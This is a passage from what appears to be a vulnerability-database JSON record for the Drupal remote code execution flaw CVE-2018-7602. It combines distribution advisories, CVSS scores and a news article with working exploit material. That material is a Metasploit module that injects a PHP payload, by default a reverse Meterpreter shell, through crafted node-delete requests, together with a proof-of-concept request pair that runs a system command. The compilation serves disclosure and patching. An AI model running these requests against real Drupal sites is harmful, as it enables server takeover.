\"#{uri_path}/?q=node/#{drupal_node}/delete&destination=node?q[%2523post_render][]=passthru%26q[%2523type]=markup%26q[%2523markup]=php%20-r%20'#{payload.encoded}'\",\n 'vars_post' => {\n 'form_id' => 'node_delete_confirm',\n '_triggering_element_name' => 'form_id',\n 'form_token'=> \"#{form_token}\"\n }\n })\n form_build_id = r2.body.scan( /form_build_id\" value=\"([^>]*)\" \\/>/).last.first\n print \"[*] Token Form_build_id -> #{form_build_id}\\n\"\n r3 = send_request_cgi({\n 'method' => 'POST',\n 'cookie' => datastore['DRUPAL_SESSION'],\n 'uri' => \"#{uri_path}/?q=file/ajax/actions/cancel/%23options/path/#{form_build_id}\",\n 'vars_post' => {\n 'form_build_id' => \"#{form_build_id}\"\n }\n })\n end\n \n def exploit\n case datastore['TARGET']\n when 0\n start_exploit\n else\n fail_with(Failure::BadConfig, \"Your target is invalid.\")\n end\n end\n end", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-04-01T19:04:13", "description": "\nDrupal 7.58 - 
Drupalgeddon3 (Authenticated) Remote Code Execution (PoC)", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2018-04-25T00:00:00", "title": "Drupal 7.58 - Drupalgeddon3 (Authenticated) Remote Code Execution (PoC)", "type": "exploitpack", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7602"], "modified": "2018-04-25T00:00:00", "id": "EXPLOITPACK:08FA21237E28AF0AAD1F202F20D414F2", "href": "", "sourceData": "This is a sample of exploit for Drupal 7 new vulnerability SA-CORE-2018-004 / CVE-2018-7602.\n\nYou must be authenticated and with the power of deleting a node. 
Some other forms may be vulnerable : at least, all of forms that is in 2-step (form then confirm).\n\nPOST /?q=node/99/delete&destination=node?q[%2523][]=passthru%26q[%2523type]=markup%26q[%2523markup]=whoami HTTP/1.1\n[...]\nform_id=node_delete_confirm&_triggering_element_name=form_id&form_token=[CSRF-TOKEN]\n\nRetrieve the form_build_id from the response, and then triggering the exploit with : \n\nPOST /drupal/?q=file/ajax/actions/cancel/%23options/path/[FORM_BUILD_ID] HTTP/1.1\n[...]\nform_build_id=[FORM_BUILD_ID]\n\nThis will display the result of the whoami command.\n\nPatch your systems!\nBlaklis", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "debian": [{"lastseen": "2021-10-22T12:54:30", "description": "Package : drupal7\nVersion : 7.14-2+deb7u19\nCVE ID : CVE-2018-7602\nDebian Bug : 895778\n\nA remote code execution vulnerability has been found within multiple\nsubsystems of Drupal. This potentially allows attackers to exploit\nmultiple attack vectors on a Drupal site, which could result in the\nsite being compromised.\n\n\nFor Debian 7 \"Wheezy\", these problems have been fixed in version\n7.14-2+deb7u19.\n\nWe recommend that you upgrade your drupal7 packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2018-04-26T09:28:04", "type": "debian", "title": "[SECURITY] [DLA 1365-1] drupal7 security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", 
"exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7602"], "modified": "2018-04-26T09:28:04", "id": "DEBIAN:DLA-1365-1:59638", "href": "https://lists.debian.org/debian-lts-announce/2018/04/msg00030.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-01T15:51:08", "description": "Package : drupal7\nVersion : 7.14-2+deb7u19\nCVE ID : CVE-2018-7602\nDebian Bug : 895778\n\nA remote code execution vulnerability has been found within multiple\nsubsystems of Drupal. This potentially allows attackers to exploit\nmultiple attack vectors on a Drupal site, which could result in the\nsite being compromised.\n\n\nFor Debian 7 \"Wheezy\", these problems have been fixed in version\n7.14-2+deb7u19.\n\nWe recommend that you upgrade your drupal7 packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2018-04-26T09:28:04", "type": "debian", "title": "[SECURITY] [DLA 1365-1] drupal7 security update", "bulletinFamily": "unix", "cvss2": {"severity": 
"HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7602"], "modified": "2018-04-26T09:28:04", "id": "DEBIAN:DLA-1365-1:21036", "href": "https://lists.debian.org/debian-lts-announce/2018/04/msg00030.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-10-21T19:02:35", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-4180-1 security@debian.org\nhttps://www.debian.org/security/ Salvatore Bonaccorso\nApril 25, 2018 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : drupal7\nCVE ID : CVE-2018-7602\nDebian Bug : 896701\n\nA remote code execution vulnerability has been found in Drupal, a\nfully-featured content management framework. 
For additional information,\nplease refer to the upstream advisory at\nhttps://www.drupal.org/sa-core-2018-004\n\nFor the oldstable distribution (jessie), this problem has been fixed\nin version 7.32-1+deb8u12.\n\nFor the stable distribution (stretch), this problem has been fixed in\nversion 7.52-2+deb9u4.\n\nWe recommend that you upgrade your drupal7 packages.\n\nFor the detailed security status of drupal7 please refer to its security\ntracker page at:\nhttps://security-tracker.debian.org/tracker/drupal7\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2018-04-25T20:13:52", "type": "debian", "title": "[SECURITY] [DSA 4180-1] drupal7 security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7602"], "modified": "2018-04-25T20:13:52", "id": "DEBIAN:DSA-4180-1:E5B13", "href": "https://lists.debian.org/debian-security-announce/2018/msg00107.html", "cvss": 
{"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-02-18T23:48:36", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-4180-1 security@debian.org\nhttps://www.debian.org/security/ Salvatore Bonaccorso\nApril 25, 2018 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : drupal7\nCVE ID : CVE-2018-7602\nDebian Bug : 896701\n\nA remote code execution vulnerability has been found in Drupal, a\nfully-featured content management framework. For additional information,\nplease refer to the upstream advisory at\nhttps://www.drupal.org/sa-core-2018-004\n\nFor the oldstable distribution (jessie), this problem has been fixed\nin version 7.32-1+deb8u12.\n\nFor the stable distribution (stretch), this problem has been fixed in\nversion 7.52-2+deb9u4.\n\nWe recommend that you upgrade your drupal7 packages.\n\nFor the detailed security status of drupal7 please refer to its security\ntracker page at:\nhttps://security-tracker.debian.org/tracker/drupal7\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2018-04-25T20:13:52", "type": "debian", "title": "[SECURITY] [DSA 4180-1] drupal7 security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, 
"obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7602"], "modified": "2018-04-25T20:13:52", "id": "DEBIAN:DSA-4180-1:8EEC5", "href": "https://lists.debian.org/debian-security-announce/2018/msg00107.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "threatpost": [{"lastseen": "2019-04-25T05:50:09", "description": "The Ukrainian Energy Ministry has been hit by a ransomware attack \u2013 and for once it looks like this is the work of amateurs, not nation-state attackers bent on making a geopolitical point. However, the bad actors appear to have made use of the recently patched Drupal vulnerability, pointing out yet once again that patch management needs to be a top security-posture priority for government and critical infrastructure organizations.\n\nSophisticated APT attackers have repeatedly targeted Ukrainian government networks and critical infrastructure in recent years, and most researchers have pointed the attribution finger squarely towards APTs such as BlackEnergy and threat actors behind malware Bad Rabbit and Petya/ExPetr. However, in this case, the attack seems to be financially motivated.\n\nResearchers suspect that the incident was two-pronged: First, a hacker (going by the handle \u201cX-zakaria,\u201d according to researchers at AlienVault quoted in a [BBC](<http://www.bbc.com/news/technology-43877677>) report) was able to deface the website, while a second hacker then used the first actor\u2019s backdoor to go in and encrypt the website\u2019s files. 
The English-language ransom note is demanding 0.1 bitcoin, or about $928 as of this time of writing.\n\n**Limited Damage, Limited Skill**\n\nUkrainian-cyber police spokeswoman Yulia Kvitko called the damage \u201cisolated\u201d, resulting in the defacement and locking up of the ministry website. She [told](<https://www.reuters.com/article/us-china-tech-gender/chinese-tech-giants-government-under-fire-for-men-only-job-ads-idUSKBN1HV0EY>) _Reuters_ that the attacks didn\u2019t affect other government systems or the country\u2019s state-run energy companies.\n\n\u201cThis case is not large-scale. If necessary, we are ready to react and help,\u201d Kvitko said. \u201cOur specialists are working right now \u2026 We do not know how long it will take to resolve the issue. Ukrenergo, Energoatom \u2013 everything is okay with their sites, it\u2019s only our site that does not work.\u201d\n\n\u201cFrom what has been seen, it is clearly multiple cyber-actors, possibly working together, or not, though it\u2019s likely they have been in communication at the minimum,\u201d Joseph Carson, chief security scientist at Thycotic, told Threatpost.\n\nHe added that while the incident shows little advanced skill, it shouldn\u2019t be discounted: \u201cIt\u2019s very likely that the cybercriminals behind this recent cyberattack against the Ukrainian Energy Ministry are testing their new skills in order to improve for a bigger cyberattack later, or to get acceptance into a new underground cyber-group that requires showing a display of skills and ability,\u201d said Carson.\n\nIt\u2019s also interesting to note that the attack used ransomware, which at this point seems almost a throwback threat vector; recently, cryptomining [has gained top billing](<https://threatpost.com/cryptomining-gold-rush-one-gang-rakes-in-7m-over-6-months/130232/>) for financially motivated types, thanks to the skyrocketing value of virtual currencies.\n\n\u201cRansomware has been waning as an overall attack 
vector, with only one device in every 10,000 showing signs of ransomware for the period of August 2017 through January 2018,\u201d Mike Banic, vice president of marketing at Vectra, told us. \u201cThe [WannaCry](<https://threatpost.com/u-s-government-blames-north-korea-for-wannacry/129201/>) attack collected approximately $72,000 in ransom. The industry responded to the NotPetya and WannaCry attacks by patching Windows systems to remove the Eternal Blue exploit and bolstering their data backup and recovery programs. As ransomware started to wane in 2017, we saw a rise in cryptomining, which has been prevalent in higher-education, technology companies and healthcare organizations.\u201d\n\n**An Avoidable Attack: Drupal Vulnerability Exploited**\n\nThe attackers appear to be exploiting the [Drupalgeddon2](<https://groups.drupal.org/security/faq-2018-002>), a highly critical remote code execution bug affecting most Drupal sites, which was disclosed at the end of March (and since patched). That bug is now being actively exploited by hackers stocked with automated tools, including a newly uncovered botnet, dubbed Muhstik, that we [reported on yesterday](<https://threatpost.com/muhstik-botnet-exploits-highly-critical-drupal-bug/131360/>).\n\nDrupal also [announced](<https://www.drupal.org/psa-2018-003>) this week that a new vulnerability (details are scant) is being patched April 25.\n\n\u201cLooking over the Internet archive of this site, it appears that they were running Drupal 7, which is currently under active attack by automated attackers armed with Drupalgeddon2 exploits,\u201d Craig Young, security researcher at Tripwire, said via email. 
\u201cIt is also possible (although less likely) that someone is already exploiting CVE-2018-7602 which the Drupal team announced just yesterday, but has yet to provide a public fix.\u201d\n\nOrganizations \u2013 especially those running critical, strategic networks, it goes without saying \u2013 should know that off-the-shelf content management systems like Drupal, WordPress and Joomla are widely deployed and a key target of automated exploits. In fact, these platforms may start seeing exploitation within days or even hours of a critical disclosure, added Young: \u201cThese public facing systems must be a top priority for infosec teams.\u201d\n", "cvss3": {}, "published": "2018-04-24T18:34:37", "type": "threatpost", "title": "Ransomware Attack Hits Ukrainian Energy Ministry, Exploiting Drupalgeddon2", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-7602"], "modified": "2018-04-24T18:34:37", "id": "THREATPOST:BBF186A7D1D5679576FBB39E0B3F05F2", "href": "https://threatpost.com/ransomware-attack-hits-ukrainian-energy-ministry-exploiting-drupalgeddon2/131373/", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "packetstorm": [{"lastseen": "2018-05-07T01:19:11", "description": "", "cvss3": {}, "published": "2018-04-30T00:00:00", "type": "packetstorm", "title": "Drupalgeddon3 Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-7602"], "modified": "2018-04-30T00:00:00", "id": "PACKETSTORM:147407", "href": "https://packetstormsecurity.com/files/147407/Drupalgeddon3-Remote-Code-Execution.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \n \ndef initialize(info={}) \nsuper(update_info(info, \n'Name' => 'Drupalgeddon3', \n'Description' => %q{ 
\nCVE-2018-7602 / SA-CORE-2018-004 \nA remote code execution vulnerability exists within multiple subsystems of Drupal 7.x and 8.x. \nThis potentially allows attackers to exploit multiple attack vectors on a Drupal site \nWhich could result in the site being compromised. \nThis vulnerability is related to Drupal core - Highly critical - Remote Code Execution \n \nThe module can load msf PHP arch payloads, using the php/base64 encoder. \n \nThe resulting RCE on Drupal looks like this: php -r 'eval(base64_decode(#{PAYLOAD}));' \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'SixP4ck3r', # Research and port to MSF \n'Blaklis' # Initial PoC \n], \n'References' => \n[ \n['SA-CORE', '2018-004'], \n['CVE', '2018-7602'], \n], \n'DefaultOptions' => \n{ \n'encoder' => 'php/base64', \n'payload' => 'php/meterpreter/reverse_tcp', \n}, \n'Privileged' => false, \n'Platform' => ['php'], \n'Arch' => [ARCH_PHP], \n'Targets' => \n[ \n['User register form with exec', {}], \n], \n'DisclosureDate' => 'Apr 29 2018', \n'DefaultTarget' => 0 \n)) \n \nregister_options( \n[ \nOptString.new('TARGETURI', [ true, \"The target URI of the Drupal installation\", '/']), \nOptString.new('DRUPAL_NODE', [ true, \"Exist Node Number (Page, Article, Forum topic, or a Post)\", '1']), \nOptString.new('DRUPAL_SESSION', [ true, \"Authenticated Cookie Session\", '']), \n]) \n \nregister_advanced_options( \n[ \n \n]) \nend \n \ndef uri_path \nnormalize_uri(target_uri.path) \nend \n \ndef start_exploit \ndrupal_node = datastore['DRUPAL_NODE'] \nres = send_request_cgi({ \n'cookie' => datastore['DRUPAL_SESSION'], \n'method' => 'GET', \n'uri' => \"#{uri_path}/node/#{drupal_node}/delete\" \n}) \nform_token = res.body.scan( /form_token\" value=\"([^>]*)\" \\/>/).last.first \nprint \"[*] Token Form -> #{form_token}\\n\" \nr2 = send_request_cgi({ \n'method' => 'POST', \n'cookie' => datastore['DRUPAL_SESSION'], \n'uri' => 
\"#{uri_path}/?q=node/#{drupal_node}/delete&destination=node?q[%2523post_render][]=passthru%26q[%2523type]=markup%26q[%2523markup]=php%20-r%20'#{payload.encoded}'\", \n'vars_post' => { \n'form_id' => 'node_delete_confirm', \n'_triggering_element_name' => 'form_id', \n'form_token'=> \"#{form_token}\" \n} \n}) \nform_build_id = r2.body.scan( /form_build_id\" value=\"([^>]*)\" \\/>/).last.first \nprint \"[*] Token Form_build_id -> #{form_build_id}\\n\" \nr3 = send_request_cgi({ \n'method' => 'POST', \n'cookie' => datastore['DRUPAL_SESSION'], \n'uri' => \"#{uri_path}/?q=file/ajax/actions/cancel/%23options/path/#{form_build_id}\", \n'vars_post' => { \n'form_build_id' => \"#{form_build_id}\" \n} \n}) \nend \n \ndef exploit \ncase datastore['TARGET'] \nwhen 0 \nstart_exploit \nelse \nfail_with(Failure::BadConfig, \"Your target is invalid.\") \nend \nend \nend \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/147407/drupalgeddon3-exec.rb.txt", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-04-27T01:05:58", "description": "", "cvss3": {}, "published": "2018-04-26T00:00:00", "type": "packetstorm", "title": "Drupal drupgeddon3 Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-7602"], "modified": "2018-04-26T00:00:00", "id": "PACKETSTORM:147380", "href": "https://packetstormsecurity.com/files/147380/Drupal-drupgeddon3-Remote-Code-Execution.html", "sourceData": "`This is a sample of exploit for Drupal 7 new vulnerability SA-CORE-2018-004 / CVE-2018-7602. \n \nYou must be authenticated and with the power of deleting a node. Some other forms may be vulnerable : at least, all of forms that is in 2-step (form then confirm). \n \nPOST /?q=node/99/delete&destination=node?q[%2523][]=passthru%26q[%2523type]=markup%26q[%2523markup]=whoami HTTP/1.1 \n[...] 
\nform_id=node_delete_confirm&_triggering_element_name=form_id&form_token=[CSRF-TOKEN] \n \nRetrieve the form_build_id from the response, and then triggering the exploit with : \n \nPOST /drupal/?q=file/ajax/actions/cancel/%23options/path/[FORM_BUILD_ID] HTTP/1.1 \n[...] \nform_build_id=[FORM_BUILD_ID] \n \nThis will display the result of the whoami command. \n \nPatch your systems! \nBlaklis \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/147380/drupalgeddon3-exec.txt", "cvss": {"score": 0.0, "vector": "NONE"}}], "alpinelinux": [{"lastseen": "2022-07-20T18:06:51", "description": "A remote code execution vulnerability exists within multiple subsystems of Drupal 7.x and 8.x. This potentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being compromised. This vulnerability is related to Drupal core - Highly critical - Remote Code Execution - SA-CORE-2018-002. Both SA-CORE-2018-002 and this vulnerability are being exploited in the wild.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-07-19T17:29:00", "type": "alpinelinux", "title": "CVE-2018-7602", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, 
"impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7602"], "modified": "2021-04-20T12:52:00", "id": "ALPINE:CVE-2018-7602", "href": "https://security.alpinelinux.org/vuln/CVE-2018-7602", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "archlinux": [{"lastseen": "2021-07-28T14:34:04", "description": "Arch Linux Security Advisory ASA-201804-10\n==========================================\n\nSeverity: Critical\nDate : 2018-04-27\nCVE-ID : CVE-2018-7602\nPackage : drupal\nType : arbitrary command execution\nRemote : Yes\nLink : https://security.archlinux.org/AVG-679\n\nSummary\n=======\n\nThe package drupal before version 8.5.3-1 is vulnerable to arbitrary\ncommand execution.\n\nResolution\n==========\n\nUpgrade to 8.5.3-1.\n\n# pacman -Syu \"drupal>=8.5.3-1\"\n\nThe problem has been fixed upstream in version 8.5.3.\n\nWorkaround\n==========\n\nNone.\n\nDescription\n===========\n\nA remote code execution vulnerability exists within multiple subsystems\nof Drupal 7.x and 8.x. 
This potentially allows attackers to exploit\nmultiple attack vectors on a Drupal site, which could result in the\nsite being compromised.\n\nImpact\n======\n\nA remote attacker is able to execute arbitrary code by performing a\nspecially crafted request.\n\nReferences\n==========\n\nhttps://www.drupal.org/sa-core-2018-004\nhttps://github.com/drupal/drupal/commit/bb6d396609600d1169da29456ba3db59abae4b7e\nhttps://security.archlinux.org/CVE-2018-7602", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2018-04-27T00:00:00", "type": "archlinux", "title": "[ASA-201804-10] drupal: arbitrary command execution", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7602"], "modified": "2018-04-27T00:00:00", "id": "ASA-201804-10", "href": "https://security.archlinux.org/ASA-201804-10", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "checkpoint_advisories": [{"lastseen": "2021-12-17T11:29:30", "description": "A code execution vulnerability exists in Drupal Core. 
Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2018-04-26T00:00:00", "type": "checkpoint_advisories", "title": "Drupal Core Remote Code Execution (CVE-2018-7602)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7602"], "modified": "2018-04-26T00:00:00", "id": "CPAI-2018-0355", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "debiancve": [{"lastseen": "2021-12-14T17:47:52", "description": "A remote code execution vulnerability exists within multiple subsystems of Drupal 7.x and 8.x. This potentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being compromised. This vulnerability is related to Drupal core - Highly critical - Remote Code Execution - SA-CORE-2018-002. 
Both SA-CORE-2018-002 and this vulnerability are being exploited in the wild.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2018-07-19T17:29:00", "type": "debiancve", "title": "CVE-2018-7602", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7602"], "modified": "2018-07-19T17:29:00", "id": "DEBIANCVE:CVE-2018-7602", "href": "https://security-tracker.debian.org/tracker/CVE-2018-7602", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-14T17:47:52", "description": "The request_path function in includes/bootstrap.inc in Drupal 7.14 and earlier allows remote attackers to obtain sensitive information via the q[] parameter to index.php, which reveals the installation path in an error message.", "cvss3": {}, "published": "2012-05-21T22:55:00", "type": "debiancve", "title": "CVE-2012-2922", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 